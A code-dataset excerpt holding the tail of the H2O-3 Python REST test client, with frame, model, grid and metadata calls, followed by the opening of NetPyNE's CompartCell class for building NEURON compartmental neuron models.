timeout=timeoutSecs,
params={"path": path}
)
H2O.verboseprint("\nimport_files result:", h2o_test_utils.dump_json(a))
return a
'''
Parse an imported raw file or files into a Frame.
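Illustrative flow (a hedged sketch; the 'destination_frames' field name is assumed
from the /3/ImportFiles response, and the path/key names here are hypothetical):
    import_result = node.import_files('/path/to/data.csv')
    frame_key = import_result['destination_frames'][0]
    parse_result = node.parse(frame_key, dest_key='data.hex')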
'''
def parse(self, key, dest_key=None,
timeoutSecs=300, retryDelaySecs=0.2, initialDelaySecs=None, pollTimeoutSecs=180,
noise=None, benchmarkLogging=None, noPoll=False, **kwargs):
#
# Call ParseSetup?source_frames=[keys] . . .
#
if benchmarkLogging:
cloudPerfH2O.get_log_save(initOnly=True)
# TODO: multiple keys
parse_setup_params = {
'source_frames': '["' + key + '"]' # NOTE: quote key names
}
# h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'parse_setup', print_params=H2O.verbose)
setup_result = self.__do_json_request(jsonRequest="/3/ParseSetup", cmd='post', timeout=timeoutSecs, postData=parse_setup_params)
H2O.verboseprint("ParseSetup result:", h2o_test_utils.dump_json(setup_result))
#
# and then Parse?source_frames=<keys list> and params from the ParseSetup result
# Parse?source_frames=[nfs://Users/rpeck/Source/h2o2/smalldata/logreg/prostate.csv]&destination_frame=prostate.hex&parse_type=CSV&separator=44&number_columns=9&check_header=0&single_quotes=false&column_names=['ID',CAPSULE','AGE','RACE','DPROS','DCAPS','PSA','VOL','GLEASON]
#
parse_params = {
'source_frames': '["' + setup_result['source_frames'][0]['name'] + '"]', # TODO: cons up the whole list
'destination_frame': dest_key if dest_key else setup_result['destination_frame'],
'parse_type': setup_result['parse_type'],
'separator': setup_result['separator'],
'single_quotes': setup_result['single_quotes'],
'check_header': setup_result['check_header'],
'number_columns': setup_result['number_columns'],
'column_names': setup_result['column_names'], # gets stringified inside __do_json_request()
'column_types': setup_result['column_types'], # gets stringified inside __do_json_request()
'na_strings': setup_result['na_strings'],
'chunk_size': setup_result['chunk_size'],
}
H2O.verboseprint("parse_params: " + repr(parse_params))
h2o_test_utils.check_params_update_kwargs(parse_params, kwargs, 'parse', print_params=H2O.verbose)
parse_result = self.__do_json_request(jsonRequest="/3/Parse", cmd='post', timeout=timeoutSecs, postData=parse_params, **kwargs)
H2O.verboseprint("Parse result:", h2o_test_utils.dump_json(parse_result))
# print("Parse result:", repr(parse_result))
job_key = parse_result['job']['key']['name']
# TODO: dislike having different shapes for noPoll and poll
if noPoll:
return self.jobs(job_key)
job_json = self.poll_job(job_key, timeoutSecs=timeoutSecs)
if job_json:
dest_key = job_json['jobs'][0]['dest']['name']
return self.frames(dest_key)
return None
'''
Return a single Frame or all of the Frames in the h2o cluster. The
frames are contained in a list called "frames" at the top level of the
result. Currently the list is unordered.
TODO:
When find_compatible_models is implemented then the top level
dict will also contain a "models" list.
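Illustrative usage (hedged; the key name is hypothetical):
    all_frames = node.frames()                   # every Frame in the cluster
    one_frame = node.frames(key='prostate.hex')  # a single Frame by key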
'''
def frames(self, key=None, timeoutSecs=10, **kwargs):
params_dict = {
'find_compatible_models': 0,
'row_offset': 0,
'row_count': 100
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'frames', H2O.verbose)
if key:
result = self.__do_json_request('/3/Frames/' + key, timeout=timeoutSecs, params=params_dict)
else:
result = self.__do_json_request('/3/Frames', timeout=timeoutSecs, params=params_dict)
return result
'''
Return the columns for a single Frame in the h2o cluster.
'''
def columns(self, key, timeoutSecs=10, **kwargs):
params_dict = {
'row_offset': 0,
'row_count': 100
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'columns', H2O.verbose)
result = self.__do_json_request('/3/Frames/' + key + '/columns', timeout=timeoutSecs, params=params_dict)
return result
'''
Return a single column for a single Frame in the h2o cluster.
'''
def column(self, key, column, timeoutSecs=10, **kwargs):
params_dict = {
'row_offset': 0,
'row_count': 100
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'column', H2O.verbose)
result = self.__do_json_request('/3/Frames/' + key + '/columns/' + column, timeout=timeoutSecs, params=params_dict)
return result
'''
Return the summary for a single column for a single Frame in the h2o cluster.
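Illustrative usage (a hedged sketch; key and column names are hypothetical):
    s = node.summary('prostate.hex', 'AGE')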
'''
def summary(self, key, column, timeoutSecs=10, **kwargs):
params_dict = {
'row_offset': 0,
'row_count': 100
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'summary', H2O.verbose)
result = self.__do_json_request('/3/Frames/' + key + '/columns/' + column + '/summary', timeout=timeoutSecs, params=params_dict)
return result
'''
Use Rapids to execute as.factor on the column of a Frame.
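For example (illustrative key/column names), as_factor('prostate.hex', 'RACE') posts
this Rapids AST, per the format string below:
    (assign prostate.hex (:= prostate.hex (as.factor (cols_py prostate.hex "RACE")) "RACE" []))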
'''
def as_factor(self, key, column, timeoutSecs=60):
assert key is not None, 'FAIL: "key" parameter is null'
assert column is not None, 'FAIL: "column" parameter is null'
# quote column names; leave integer column indexes alone
if isinstance(column, basestring):
column = '"' + column + '"'
params_dict = {
'ast': "(assign {0} (:= {0} (as.factor (cols_py {0} {1})) {1} []))".format(key, column)
}
result = self.__do_json_request('/99/Rapids', cmd='post', timeout=timeoutSecs, postData=params_dict)
return result
'''
Delete a frame on the h2o cluster, given its key.
'''
def delete_frame(self, key, ignoreMissingKey=True, timeoutSecs=60, **kwargs):
assert key is not None, 'FAIL: "key" parameter is null'
result = self.__do_json_request('/3/Frames/' + key, cmd='delete', timeout=timeoutSecs)
# TODO: look for what?
if not ignoreMissingKey and 'f00b4r' in result:
raise ValueError('Frame key not found: ' + key)
return result
'''
Delete all frames on the h2o cluster.
'''
def delete_frames(self, timeoutSecs=60, **kwargs):
parameters = { }
result = self.__do_json_request('/3/Frames', cmd='delete', timeout=timeoutSecs)
return result
'''
Return a model builder or all of the model builders known to the
h2o cluster. The model builders are contained in a dictionary
called "model_builders" at the top level of the result. The
dictionary maps algorithm names to parameters lists. Each of the
parameters contains all the metadata required by a client to
present a model building interface to the user.
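Illustrative access into the result (a hedged sketch):
    builders = node.model_builders()
    gbm_info = builders['model_builders']['gbm']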
'''
def model_builders(self, algo=None, timeoutSecs=10, **kwargs):
params_dict = {
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'model_builders', H2O.verbose)
if algo:
if algo in H2O.experimental_algos:
_rest_version = 99
else:
_rest_version = 3
result = self.__do_json_request(str(_rest_version)+'/ModelBuilders/' + algo, timeout=timeoutSecs, params=params_dict)
else:
result = self.__do_json_request('3/ModelBuilders', timeout=timeoutSecs, params=params_dict)
return result
'''
Check a dictionary of model builder parameters on the h2o cluster using the given algorithm and model parameters.
'''
def validate_model_parameters(self, algo, training_frame, parameters, timeoutSecs=60, **kwargs):
assert algo is not None, 'FAIL: "algo" parameter is null'
# Allow this now: assert training_frame is not None, '"training_frame" parameter is null'
assert parameters is not None, 'FAIL: "parameters" parameter is null'
model_builders = self.model_builders(timeoutSecs=timeoutSecs)
assert model_builders is not None, "FAIL: /ModelBuilders REST call failed"
assert algo in model_builders['model_builders'], "FAIL: algo " + algo + " not found in model_builders list: " + repr(model_builders)
builder = model_builders['model_builders'][algo]
# TODO: test this assert, I don't think this is working. . .
if training_frame is not None:
frames = self.frames(key=training_frame)
assert frames is not None, "FAIL: /Frames/{0} REST call failed".format(training_frame)
assert frames['frames'][0]['frame_id']['name'] == training_frame, "FAIL: /Frames/{0} returned Frame {1} rather than Frame {2}".format(training_frame, frames['frames'][0]['frame_id']['name'], training_frame)
parameters['training_frame'] = training_frame
# TODO: add parameter existence checks
# TODO: add parameter value validation
if algo in H2O.experimental_algos:
_rest_version = 99
else:
_rest_version = 3
result = self.__do_json_request('/' + str(_rest_version) + '/ModelBuilders/' + algo + "/parameters", cmd='post', timeout=timeoutSecs, postData=parameters, ignoreH2oError=True, noExtraErrorCheck=True, raiseIfNon200=False, suppressErrorMsg=True) # NOTE: DO NOT die if validation errors
H2O.verboseprint("model parameters validation: " + repr(result))
return result
'''
Build a model on the h2o cluster using the given algorithm, training
Frame and model parameters.
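Illustrative usage (a hedged sketch; parameter names depend on the algo's schema and
the frame/column names here are hypothetical):
    result = node.build_model('gbm', 'prostate.hex',
                              {'response_column': 'CAPSULE', 'ntrees': 50})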
'''
def build_model(self, algo, training_frame, parameters, model_id = None, timeoutSecs=60, asynchronous=False, **kwargs):
# basic parameter checking
assert algo is not None, 'FAIL: "algo" parameter is null'
assert training_frame is not None, 'FAIL: "training_frame" parameter is null'
assert parameters is not None, 'FAIL: "parameters" parameter is null'
# check that algo is known (TODO: remove after testing that error from POST is good enough)
model_builders = self.model_builders(timeoutSecs=timeoutSecs)
assert model_builders is not None, "FAIL: /ModelBuilders REST call failed"
assert algo in model_builders['model_builders'], "FAIL: failed to find algo " + algo + " in model_builders list: " + repr(model_builders)
builder = model_builders['model_builders'][algo]
# TODO: test this assert, I don't think this is working. . .
# Check for frame:
frames = self.frames(key=training_frame)
assert frames is not None, "FAIL: /Frames/{0} REST call failed".format(training_frame)
assert frames['frames'][0]['frame_id']['name'] == training_frame, "FAIL: /Frames/{0} returned Frame {1} rather than Frame {2}".format(training_frame, frames['frames'][0]['frame_id']['name'], training_frame)
parameters['training_frame'] = training_frame
if model_id is not None:
parameters['model_id'] = model_id
result = self.__do_json_request('/3/ModelBuilders/' + algo, cmd='post', timeout=timeoutSecs, postData=parameters, raiseIfNon200=False, suppressErrorMsg=True) # NOTE: DO NOT die if validation errors
if asynchronous:
return result
elif 'error_count' in result and result['error_count'] > 0:
# parameters validation failure
return result
elif result['__http_response']['status_code'] != 200:
return result
else:
assert 'job' in result, "FAIL: did not find job key in model build result: " + repr(result)
job = result['job']
job_key = job['key']['name']
H2O.verboseprint("model building job_key: " + repr(job_key))
job_json = self.poll_job(job_key, timeoutSecs=timeoutSecs)
return result
'''
Build a Cartesian grid of models on the h2o cluster using the given algorithm, training Frame, model parameters and grid parameters.
The search_criteria parameter is an optional dictionary which specifies smarter hyperparameter search.
For example, if we set grid_parameters and search_criteria as follows:
{ 'ntrees': [1, 2, 4], 'distribution': ["gaussian", "poisson", "gamma", "tweedie"] }, { 'strategy': "Random", 'max_models': 5 }
5 models will be built from the 12 possible combinations.
Available search_criteria parameters are:
'strategy': 'Cartesian' (the default) or 'Random'
'max_models': an optional integer limit on the number of models
'max_time_ms': an optional limit on the total runtime, in milliseconds (ms)
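Illustrative usage (a hedged sketch; frame/column names are hypothetical):
    result = node.build_model_grid('gbm', 'prostate.hex',
                                   {'response_column': 'CAPSULE'},
                                   {'ntrees': [1, 2, 4]},
                                   search_criteria={'strategy': "Random", 'max_models': 2})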
'''
def build_model_grid(self, algo, training_frame, parameters, grid_parameters, grid_id = None, timeoutSecs=60, asynchronous=False, search_criteria=None, **kwargs):
# basic parameter checking
assert algo is not None, 'FAIL: "algo" parameter is null'
assert training_frame is not None, 'FAIL: "training_frame" parameter is null'
assert parameters is not None, 'FAIL: "parameters" parameter is null'
assert grid_parameters is not None, 'FAIL: "grid_parameters" parameter is null'
# check that algo is known (TODO: remove after testing that error from POST is good enough)
model_builders = self.model_builders(timeoutSecs=timeoutSecs)
assert model_builders is not None, "FAIL: /ModelBuilders REST call failed"
assert algo in model_builders['model_builders'], "FAIL: failed to find algo " + algo + " in model_builders list: " + repr(model_builders)
builder = model_builders['model_builders'][algo]
# TODO: test this assert, I don't think this is working. . .
# Check for frame:
frames = self.frames(key=training_frame)
assert frames is not None, "FAIL: /Frames/{0} REST call failed".format(training_frame)
assert frames['frames'][0]['frame_id']['name'] == training_frame, "FAIL: /Frames/{0} returned Frame {1} rather than Frame {2}".format(training_frame, frames['frames'][0]['frame_id']['name'], training_frame)
parameters['training_frame'] = training_frame
# UGH: grid parameters are totally non-standard; the model parameters are mixed with grid_id and hyper_parameters. See GridSearchSchema.fillFromParms().
post_parameters = {}
post_parameters.update(parameters)
post_parameters['hyper_parameters'] = grid_parameters
# gridParams['grid_parameters'] = json.dumps(hyperParameters)
post_parameters['search_criteria'] = search_criteria
# print("post_parameters: " + repr(post_parameters))
if grid_id is not None:
post_parameters['grid_id'] = grid_id
result = self.__do_json_request('/99/Grid/' + algo, cmd='post', timeout=timeoutSecs, postData=post_parameters, raiseIfNon200=False) # NOTE: DO NOT die if validation errors
if result['__meta']['schema_type'] == 'H2OError':
print("ERROR: building model grid: " + grid_id)
print(" reason: " + result['dev_msg'])
print(" stacktrace: " + "\n ".join(result['stacktrace']))
raise ValueError("ERROR: building model grid: " + grid_id + "; reason: " + result['dev_msg'])
if asynchronous:
return result
elif 'error_count' in result and result['error_count'] > 0:
# parameters validation failure
return result
elif result['__http_response']['status_code'] != 200:
return result
else:
assert 'job' in result, "FAIL: did not find job key in model build result: " + repr(result)
job = result['job']
job_key = job['key']['name']
H2O.verboseprint("model building job_key: " + repr(job_key))
job_json = self.poll_job(job_key, timeoutSecs=timeoutSecs)
return result
'''
Score a model on the h2o cluster on the given Frame and return only the model metrics.
'''
def compute_model_metrics(self, model, frame, timeoutSecs=60, **kwargs):
assert model is not None, 'FAIL: "model" parameter is null'
assert frame is not None, 'FAIL: "frame" parameter is null'
models = self.models(key=model, timeoutSecs=timeoutSecs)
assert models is not None, "FAIL: /Models REST call failed"
assert models['models'][0]['model_id']['name'] == model, "FAIL: /Models/{0} returned Model {1} rather than Model {2}".format(model, models['models'][0]['model_id']['name'], model)
# TODO: test this assert, I don't think this is working. . .
frames = self.frames(key=frame)
assert frames is not None, "FAIL: /Frames/{0} REST call failed".format(frame)
assert frames['frames'][0]['frame_id']['name'] == frame, "FAIL: /Frames/{0} returned Frame {1} rather than Frame {2}".format(frame, frames['frames'][0]['frame_id']['name'], frame)
result = self.__do_json_request('/3/ModelMetrics/models/' + model + '/frames/' + frame, cmd='post', timeout=timeoutSecs)
mm = result['model_metrics'][0]
H2O.verboseprint("model metrics: " + repr(mm))
return mm
def predict(self, model, frame, predictions_frame = None, timeoutSecs=60, **kwargs):
assert model is not None, 'FAIL: "model" parameter is null'
assert frame is not None, 'FAIL: "frame" parameter is null'
models = self.models(key=model, timeoutSecs=timeoutSecs)
# print("models (key={0}): ".format(model))
# pprint.PrettyPrinter(indent=4).pprint(models)
assert models is not None, "FAIL: /Models REST call failed"
assert models['models'][0]['model_id']['name'] == model, "FAIL: /Models/{0} returned Model {1} rather than Model {2}".format(model, models['models'][0]['model_id']['name'], model)
# TODO: test this assert, I don't think this is working. . .
frames = self.frames(key=frame)
assert frames is not None, "FAIL: /Frames/{0} REST call failed".format(frame)
assert frames['frames'][0]['frame_id']['name'] == frame, "FAIL: /Frames/{0} returned Frame {1} rather than Frame {2}".format(frame, frames['frames'][0]['frame_id']['name'], frame)
postData = { 'predictions_frame': predictions_frame }
result = self.__do_json_request('/3/Predictions/models/' + model + '/frames/' + frame, cmd='post', postData=postData, timeout=timeoutSecs)
return result
'''
ModelMetrics list.
'''
def model_metrics(self, model=None, frame=None, timeoutSecs=60, **kwargs):
if model is None and frame is None:
result = self.__do_json_request('/3/ModelMetrics', cmd='get', timeout=timeoutSecs)
elif model is not None and frame is not None:
result = self.__do_json_request('/3/ModelMetrics/models/' + model + '/frames/' + frame, cmd='get', timeout=timeoutSecs)
else:
raise ValueError("model_metrics can't yet handle the filter case")
return result
'''
Delete ModelMetrics.
'''
def delete_model_metrics(self, model, frame, timeoutSecs=60, **kwargs):
assert model is not None, 'FAIL: "model" parameter is null'
assert frame is not None, 'FAIL: "frame" parameter is null'
result = self.__do_json_request('/3/ModelMetrics/models/' + model + '/frames/' + frame, cmd='delete', timeout=timeoutSecs)
return result
'''
Return all of the models in the h2o cluster, or a single model given its key.
The models are contained in a list called "models" at the top level of the
result. Currently the list is unordered.
TODO:
When find_compatible_frames is implemented then the top level
dict will also contain a "frames" list.
'''
def models(self, api_version=3, key=None, timeoutSecs=20, **kwargs):
params_dict = {
'find_compatible_frames': False
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'models', H2O.verbose)
if key:
result = self.__do_json_request(str(api_version) + '/Models/' + key, timeout=timeoutSecs, params=params_dict)
else:
result = self.__do_json_request(str(api_version) + '/Models', timeout=timeoutSecs, params=params_dict)
return result
'''
Delete a model on the h2o cluster, given its key.
'''
def delete_model(self, key, ignoreMissingKey=True, timeoutSecs=60, **kwargs):
assert key is not None, 'FAIL: "key" parameter is null'
result = self.__do_json_request('/3/Models/' + key, cmd='delete', timeout=timeoutSecs)
# TODO: look for what?
if not ignoreMissingKey and 'f00b4r' in result:
raise ValueError('Model key not found: ' + key)
return result
'''
Delete all models on the h2o cluster.
'''
def delete_models(self, timeoutSecs=60, **kwargs):
parameters = { }
result = self.__do_json_request('/3/Models', cmd='delete', timeout=timeoutSecs)
return result
'''
Return all of the grid search results in the h2o cluster.
The grid IDs are contained in a list called "grids" at the top level of the
result. Currently the list is unordered.
'''
def grids(self, api_version=99, timeoutSecs=20, **kwargs):
params_dict = {
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'grids', H2O.verbose)
result = self.__do_json_request(str(api_version) + '/Grids', timeout=timeoutSecs, params=params_dict)
return result
'''
Return a grid search result from the h2o cluster given its key.
The models IDs are contained in a list called "model_ids" at the top level of the
result. Currently the list is unordered.
'''
def grid(self, api_version=99, key=None, timeoutSecs=20, **kwargs):
params_dict = {
'sort_by': None,
'decreasing': None
}
h2o_test_utils.check_params_update_kwargs(params_dict, kwargs, 'grid', H2O.verbose)
if key:
result = self.__do_json_request(str(api_version) + '/Grids/' + key, timeout=timeoutSecs, params=params_dict)
else:
raise ValueError('Grid key not given')
return result
'''
Fetch the list of REST API endpoints.
'''
def endpoints(self, timeoutSecs=60, **kwargs):
parameters = { }
result = self.__do_json_request('/3/Metadata/endpoints', cmd='get', timeout=timeoutSecs)
return result
'''
Fetch the metadata for the given numbered REST API endpoint.
'''
def endpoint_by_number(self, num, timeoutSecs=60, **kwargs):
parameters = { }
result = self.__do_json_request('/3/Metadata/endpoints/' + str(num), cmd='get', timeout=timeoutSecs)
return result
'''
Fetch the list of REST API schemas.
'''
def schemas(self, timeoutSecs=60, **kwargs):
parameters = { }
result = self.__do_json_request('/3/Metadata/schemas', cmd='get', timeout=timeoutSecs)
return result
'''
Fetch the metadata for the given named REST API schema (e.g., FrameV3).
'''
def schema(self, schemaname, timeoutSecs=60, **kwargs):
parameters = { }
result = self.__do_json_request('/3/Metadata/schemas/' + schemaname, cmd='get', timeout=timeoutSecs)
return result
'''
def grid(self, algo, parameters, hyperParameters, timeoutSecs=60, asynchronous=False, **kwargs):
assert algo is not None, 'FAIL: "algo" parameter is null'
assert parameters is not None, 'FAIL: "parameters" parameter is null'
gridParams = parameters
gridParams['grid_parameters'] = json.dumps(hyperParameters)
result = self.__do_json_request('/99/Grid/' + algo, cmd='post', postData=gridParams, raiseIfNon200=False)
if asynchronous:
return result
elif result['__http_response']['status_code'] != 200:
return result
else:
assert 'job' in result, "FAIL: did not find job key in model build result: " + repr(result)
job = result['job']
job_key = job['key']['name']
H2O.verboseprint("grid search job_key: " + repr(job_key))
job_json = self.poll_job(job_key, timeoutSecs=timeoutSecs)
return result
'''
| YzPaul3/h2o-3 | py/h2o.py | Python | apache-2.0 | 46,466 | ["Gaussian"] | 90148baf5ca32fae738ec681f67b5a8b15f3e110c130fa25da3fa1df87927d1a |
"""
cell/compartCell.py
Contains the CompartCell class
Contributors: salvadordura@gmail.com
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
from builtins import super
from builtins import next
from builtins import zip
from builtins import range
from builtins import round
from builtins import str
try:
basestring
except NameError:
basestring = str
from future import standard_library
standard_library.install_aliases()
from numbers import Number
from copy import deepcopy
from neuron import h # Import NEURON
import numpy as np
from math import sin, cos
from .cell import Cell
from ..specs import Dict
###############################################################################
#
# COMPARTMENTAL CELL CLASS
#
###############################################################################
# --- Temporarily copied from HNN code; improve so doesn't use h globals ---
# global variables for dipole calculation, should be node-independent
h("dp_total_L2 = 0."); h("dp_total_L5 = 0.") # put here since these variables used in cells
class CompartCell (Cell):
''' Class for section-based neuron models '''
def __init__ (self, gid, tags, create=True, associateGid=True):
super(CompartCell, self).__init__(gid, tags)
self.secs = Dict() # dict of sections
self.secLists = Dict() # dict of sectionLists
if create: self.create() # create cell
if associateGid: self.associateGid() # register cell for this node
def create (self):
from .. import sim
# generate random rotation angle for each cell
if sim.net.params.rotateCellsRandomly:
if isinstance(sim.net.params.rotateCellsRandomly, list):
[rotMin, rotMax] = sim.net.params.rotateCellsRandomly
else:
[rotMin, rotMax] = 0, 6.2832
rand = h.Random()
rand.Random123(self.gid)
self.randRotationAngle = rand.uniform(rotMin, rotMax) # default range: 0 to 2*pi
for propLabel, prop in sim.net.params.cellParams.items(): # for each set of cell properties
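# Each rule's 'conds' entries are matched against this cell's tags below; an
# illustrative (hypothetical) rule is {'cellType': 'PYR', 'ynorm': [0.1, 0.3]}, which
# matches cells whose 'cellType' tag equals 'PYR' and whose 'ynorm' lies in [0.1, 0.3].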
conditionsMet = 1
for (condKey,condVal) in prop['conds'].items(): # check if all conditions are met
if isinstance(condVal, list):
if isinstance(condVal[0], Number):
if self.tags.get(condKey) < condVal[0] or self.tags.get(condKey) > condVal[1]:
conditionsMet = 0
break
elif isinstance(condVal[0], basestring):
if self.tags.get(condKey) not in condVal:
conditionsMet = 0
break
elif self.tags.get(condKey) != condVal:
conditionsMet = 0
break
if conditionsMet: # if all conditions are met, set values for this cell
if sim.cfg.includeParamsLabel:
if 'label' not in self.tags:
self.tags['label'] = [propLabel] # create list of property sets
else:
self.tags['label'].append(propLabel) # add label of cell property set to list of property sets for this cell
if sim.cfg.createPyStruct:
self.createPyStruct(prop)
if sim.cfg.createNEURONObj:
self.createNEURONObj(prop) # add sections, mechanisms, synaptic mechanisms, geometry and topology specified by this property set
def modify (self, prop):
from .. import sim
conditionsMet = 1
for (condKey,condVal) in prop['conds'].items(): # check if all conditions are met
if condKey=='label':
if condVal not in self.tags['label']:
conditionsMet = 0
break
elif isinstance(condVal, list):
if isinstance(condVal[0], Number):
if self.tags.get(condKey) < condVal[0] or self.tags.get(condKey) > condVal[1]:
conditionsMet = 0
break
elif isinstance(condVal[0], basestring):
if self.tags.get(condKey) not in condVal:
conditionsMet = 0
break
elif self.tags.get(condKey) != condVal:
conditionsMet = 0
break
if conditionsMet: # if all conditions are met, set values for this cell
if sim.cfg.createPyStruct:
self.createPyStruct(prop)
if sim.cfg.createNEURONObj:
self.createNEURONObj(prop) # add sections, mechanisms, synaptic mechanisms, geometry and topology specified by this property set
def createPyStruct (self, prop):
from .. import sim
# set params for all sections
for sectName,sectParams in prop['secs'].items():
# create section
if sectName not in self.secs:
self.secs[sectName] = Dict() # create section dict
sec = self.secs[sectName] # pointer to section
# add distributed mechanisms
if 'mechs' in sectParams:
for mechName,mechParams in sectParams['mechs'].items():
if 'mechs' not in sec:
sec['mechs'] = Dict()
if mechName not in sec['mechs']:
sec['mechs'][mechName] = Dict()
for mechParamName,mechParamValue in mechParams.items(): # add params of the mechanism
sec['mechs'][mechName][mechParamName] = mechParamValue
# add ion info
if 'ions' in sectParams:
for ionName,ionParams in sectParams['ions'].items():
if 'ions' not in sec:
sec['ions'] = Dict()
if ionName not in sec['ions']:
sec['ions'][ionName] = Dict()
for ionParamName,ionParamValue in ionParams.items(): # add params of the ion
sec['ions'][ionName][ionParamName] = ionParamValue
# add synMechs
if 'synMechs' in sectParams:
for synMech in sectParams['synMechs']:
if 'label' in synMech and 'loc' in synMech:
self.addSynMech(synLabel=synMech['label'], secLabel=sectName, loc=synMech['loc'])
# add point processes
if 'pointps' in sectParams:
for pointpName,pointpParams in sectParams['pointps'].items():
#if self.tags['cellModel'] == pointpName: # only required if want to allow setting various cell models in same rule
if 'pointps' not in sec:
sec['pointps'] = Dict()
if pointpName not in sec['pointps']:
sec['pointps'][pointpName] = Dict()
for pointpParamName,pointpParamValue in pointpParams.items(): # add params of the mechanism
if pointpParamValue == 'gid':
pointpParamValue = self.gid
sec['pointps'][pointpName][pointpParamName] = pointpParamValue
# add geometry params
if 'geom' in sectParams:
for geomParamName,geomParamValue in sectParams['geom'].items():
if 'geom' not in sec:
sec['geom'] = Dict()
if not type(geomParamValue) in [list, dict]: # skip any list or dict params
sec['geom'][geomParamName] = geomParamValue
# add 3d geometry
if 'pt3d' in sectParams['geom']:
if 'pt3d' not in sec['geom']:
sec['geom']['pt3d'] = []
for ipt, pt3d in enumerate(sectParams['geom']['pt3d']):
if sim.net.params.rotateCellsRandomly == True:
"""Rotate the cell about the Z axis."""
x = pt3d[0]
z = pt3d[2]
c = cos(self.randRotationAngle)
s = sin(self.randRotationAngle)
pt3d = (x * c - z * s, pt3d[1], x * s + z * c, pt3d[3])
sectParams['geom']['pt3d'][ipt] = pt3d
sec['geom']['pt3d'].append(pt3d)
# add topology params
if 'topol' in sectParams:
if 'topol' not in sec:
sec['topol'] = Dict()
for topolParamName,topolParamValue in sectParams['topol'].items():
sec['topol'][topolParamName] = topolParamValue
# add other params
if 'spikeGenLoc' in sectParams:
sec['spikeGenLoc'] = sectParams['spikeGenLoc']
if 'vinit' in sectParams:
sec['vinit'] = sectParams['vinit']
if 'weightNorm' in sectParams:
sec['weightNorm'] = sectParams['weightNorm']
if 'threshold' in sectParams:
sec['threshold'] = sectParams['threshold']
# add sectionLists
if 'secLists' in prop:
self.secLists.update(prop['secLists']) # dict of section lists
def initV (self):
for sec in list(self.secs.values()):
if 'vinit' in sec:
sec['hObj'].v = sec['vinit']
# Create dictionary of section names with entries to scale section lengths to length along z-axis
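# e.g. a 'basal_2' section at 45 degrees to the z-axis projects with factor
# sqrt(2)/2 ~= 0.707, and the sign is flipped for basal sections since they extend
# along the negative z-axis (illustrative reading of the rules below)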
def __dipoleGetSecLength (self, secName):
L = 1
# basal_2 and basal_3 at 45 degree angle to z-axis.
if 'basal_2' in secName:
L = np.sqrt(2) / 2.
elif 'basal_3' in secName:
L = np.sqrt(2) / 2.
# apical_oblique at 90 perpendicular to z-axis
elif 'apical_oblique' in secName:
L = 0.
# All basalar dendrites extend along negative z-axis
if 'basal' in secName:
L = -L
return L
# insert dipole in section
def __dipoleInsert(self, secName, sec):
# insert dipole mech (dipole.mod)
try:
sec['hObj'].insert('dipole')
except:
print('Error inserting dipole mechanism')
return -1
# insert Dipole point process (dipole_pp.mod)
try:
sec['hDipole_pp'] = h.Dipole(1.0, sec = sec['hObj'])
except:
print('Error inserting Dipole point process')
return -1
dpp = sec['hDipole_pp']
# assign internal resistance values to dipole point process (dpp)
dpp.ri = h.ri(1, sec=sec['hObj'])
# sets pointers in dipole mod file to the correct locations -- h.setpointer(ref, ptr, obj)
h.setpointer(sec['hObj'](0.99)._ref_v, 'pv', dpp)
if self.tags['cellType'].startswith('L2'):
h.setpointer(h._ref_dp_total_L2, 'Qtotal', dpp)
elif self.tags['cellType'].startswith('L5'):
h.setpointer(h._ref_dp_total_L5, 'Qtotal', dpp)
# gives INTERNAL segments of the section, non-endpoints
# creating this because need multiple values simultaneously
loc = np.array([seg.x for seg in sec['hObj']])
# these are the normalized positions from allseg(), including both endpoints (0 and 1)
pos = np.array([seg.x for seg in sec['hObj'].allseg()])
# diff in yvals, scaled against the pos np.array. y_long as in longitudinal
y_scale = (self.__dipoleGetSecLength(secName) * sec['hObj'].L) * pos
# y_long = (h.y3d(1, sec=sect) - h.y3d(0, sec=sect)) * pos
# diff values calculate length between successive section points
y_diff = np.diff(y_scale)
for i in range(len(loc)):
# assign the ri value to the dipole
sec['hObj'](loc[i]).dipole.ri = h.ri(loc[i], sec=sec['hObj'])
# range variable 'dipole'
# set pointers to previous segment's voltage, with boundary condition
if i > 0:
h.setpointer(sec['hObj'](loc[i-1])._ref_v, 'pv', sec['hObj'](loc[i]).dipole)
else:
h.setpointer(sec['hObj'](0)._ref_v, 'pv', sec['hObj'](loc[i]).dipole)
# set aggregate pointers
h.setpointer(dpp._ref_Qsum, 'Qsum', sec['hObj'](loc[i]).dipole)
if self.tags['cellType'].startswith('L2'):
h.setpointer(h._ref_dp_total_L2, 'Qtotal', sec['hObj'](loc[i]).dipole)
elif self.tags['cellType'].startswith('L5'):
h.setpointer(h._ref_dp_total_L5, 'Qtotal', sec['hObj'](loc[i]).dipole)
# add ztan values
sec['hObj'](loc[i]).dipole.ztan = y_diff[i]
# set the pp dipole's ztan value to the last value from y_diff
dpp.ztan = y_diff[-1]
def createNEURONObj (self, prop):
from .. import sim
excludeMechs = ['dipole'] # dipole is special case
mechInsertError = False # flag to print error inserting mechanisms
# set params for all sections
for sectName,sectParams in prop['secs'].items():
# create section
if sectName not in self.secs:
self.secs[sectName] = Dict() # create sect dict if doesn't exist
if 'hObj' not in self.secs[sectName] or self.secs[sectName]['hObj'] in [None, {}, []]:
self.secs[sectName]['hObj'] = h.Section(name=sectName, cell=self) # create h Section object
sec = self.secs[sectName] # pointer to section
# set geometry params
if 'geom' in sectParams:
for geomParamName,geomParamValue in sectParams['geom'].items():
if not type(geomParamValue) in [list, dict]: # skip any list or dict params
setattr(sec['hObj'], geomParamName, geomParamValue)
# set 3d geometry
if 'pt3d' in sectParams['geom']:
h.pt3dclear(sec=sec['hObj'])
if sim.cfg.pt3dRelativeToCellLocation:
x = self.tags['x']
y = -self.tags['y'] if sim.cfg.invertedYCoord else self.tags['y'] # Neuron y-axis positive = upwards, so assume pia=0 and cortical depth = neg
z = self.tags['z']
else:
x = y = z = 0
for pt3d in sectParams['geom']['pt3d']:
h.pt3dadd(x+pt3d[0], y+pt3d[1], z+pt3d[2], pt3d[3], sec=sec['hObj'])
# add distributed mechanisms
if 'mechs' in sectParams:
for mechName,mechParams in sectParams['mechs'].items():
if mechName not in sec['mechs']:
